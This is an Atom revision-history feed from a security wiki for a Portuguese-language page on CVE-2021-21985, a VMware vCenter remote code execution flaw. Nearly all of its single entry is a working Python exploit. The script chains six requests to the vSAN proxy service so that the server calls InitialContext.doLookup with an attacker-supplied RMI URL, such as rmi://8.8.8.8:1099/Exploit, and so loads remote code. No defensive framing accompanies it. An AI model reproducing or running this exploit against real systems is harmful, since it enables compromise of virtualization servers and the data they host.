<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2021-21985_VMware_vCenter_%E9%81%A0%E7%A8%8B%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fpt</id>
	<title>CVE-2021-21985 VMware vCenter 遠程任意代碼執行漏洞/pt - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2021-21985_VMware_vCenter_%E9%81%A0%E7%A8%8B%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fpt"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-21985_VMware_vCenter_%E9%81%A0%E7%A8%8B%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/pt&amp;action=history"/>
	<updated>2026-04-04T04:57:37Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2021-21985_VMware_vCenter_%E9%81%A0%E7%A8%8B%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/pt&amp;diff=4071&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;== Referência ==&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-21985_VMware_vCenter_%E9%81%A0%E7%A8%8B%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/pt&amp;diff=4071&amp;oldid=prev"/>
		<updated>2021-06-05T01:49:23Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;== Referência ==&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages   /&amp;gt;&lt;br /&gt;
== Captura de tela ==&lt;br /&gt;
[[File:Twitter_E3CB24AUUAEl1_8.jpg | 800px ]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
import json&lt;br /&gt;
def send_request(host,uri,json):&lt;br /&gt;
    try:&lt;br /&gt;
        req = requests.post(url=host+baseuri+uri,json=json,headers=headers,verify=False)&lt;br /&gt;
        return req.text&lt;br /&gt;
    except:&lt;br /&gt;
        return False&lt;br /&gt;
def check_false(request):&lt;br /&gt;
    if request ==False or 'result' not in request:&lt;br /&gt;
        print(&amp;quot;[*] No Vuln!&amp;quot;)&lt;br /&gt;
        return True&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    if len(sys.argv) &amp;lt; 2:&lt;br /&gt;
        print('''python3 cve-2021-21985.py https://host rmi://8.8.8.8:1099/Exploit''')&lt;br /&gt;
        sys.exit()&lt;br /&gt;
    host = sys.argv[1]&lt;br /&gt;
    payload = sys.argv[2]&lt;br /&gt;
    baseuri = &amp;quot;ui/h5-vsan/rest/proxy/service/&amp;amp;vsanQueryUtil_setDataService&amp;quot;&lt;br /&gt;
    uris = [&amp;quot;/setTargetObject&amp;quot;, &amp;quot;/setStaticMethod&amp;quot;, &amp;quot;/setTargetMethod&amp;quot;, &amp;quot;/setArguments&amp;quot;, &amp;quot;/prepare&amp;quot;, &amp;quot;/invoke&amp;quot;]&lt;br /&gt;
    headers = {'Content-Type': 'application/json', &amp;quot;User-Agent&amp;quot;: &amp;quot;pentest&amp;quot;}&lt;br /&gt;
    stage_setTargetObject = json.loads('{&amp;quot;methodInput&amp;quot;:[null]}')&lt;br /&gt;
    stage_setStaticMethod = json.loads('{&amp;quot;methodInput&amp;quot;:[&amp;quot;javax.naming.InitialContext.doLookup&amp;quot;]}')&lt;br /&gt;
    stage_setTargetMethod = json.loads('{&amp;quot;methodInput&amp;quot;:[&amp;quot;doLookup&amp;quot;]}')&lt;br /&gt;
    stage_setArguments = json.loads('{&amp;quot;methodInput&amp;quot;:[[&amp;quot;%s&amp;quot;]]}'%payload)&lt;br /&gt;
    stage_prepare = json.loads('{&amp;quot;methodInput&amp;quot;:[]}')&lt;br /&gt;
    print(&amp;quot;[*] start init TargetObject&amp;quot;)&lt;br /&gt;
    # init TargetObject&lt;br /&gt;
    init_request  = send_request(host,uris[0],json=stage_setTargetObject)&lt;br /&gt;
    if check_false(init_request):&lt;br /&gt;
        print(&amp;quot;[*] init failed!&amp;quot;)&lt;br /&gt;
        exit()&lt;br /&gt;
    # Step2 setStaticMethod&lt;br /&gt;
    StaticMethod = send_request(host,uris[1],json=stage_setStaticMethod)&lt;br /&gt;
    if check_false(init_request):&lt;br /&gt;
        print(&amp;quot;[*] StaticMethod init failed!&amp;quot;)&lt;br /&gt;
        exit()&lt;br /&gt;
    # Step3 setTargetMethod&lt;br /&gt;
    StaticMethod = send_request(host,uris[2],json=stage_setTargetMethod)&lt;br /&gt;
    if check_false(init_request):&lt;br /&gt;
        print(&amp;quot;[*] setTarget Method failed!&amp;quot;)&lt;br /&gt;
        exit()&lt;br /&gt;
    # Step4 setArguments&lt;br /&gt;
    # print(stage_setArguments)&lt;br /&gt;
    setArguments = send_request(host,uris[3],json=stage_setArguments)&lt;br /&gt;
    if check_false(init_request):&lt;br /&gt;
        print(&amp;quot;[*] setArguments failstage_setArgumentsed!&amp;quot;)&lt;br /&gt;
        exit()&lt;br /&gt;
    # Step5 prepare&lt;br /&gt;
    setArguments = send_request(host,uris[4],json=stage_prepare)&lt;br /&gt;
    if check_false(init_request):&lt;br /&gt;
        print(&amp;quot;[*] stage_prepare failed!&amp;quot;)&lt;br /&gt;
        exit()&lt;br /&gt;
    # Step6 invoke&lt;br /&gt;
    setArguments = send_request(host,uris[5],json=stage_prepare)&lt;br /&gt;
    if check_false(init_request):&lt;br /&gt;
        print(&amp;quot;[*] invoke failed!&amp;quot;)&lt;br /&gt;
        exit()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Referência ==&lt;br /&gt;
https://github.com/xnianq/cve-2021-21985_exp/&lt;br /&gt;
&lt;br /&gt;
https://twitter.com/_0xf4n9x_?s=21&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>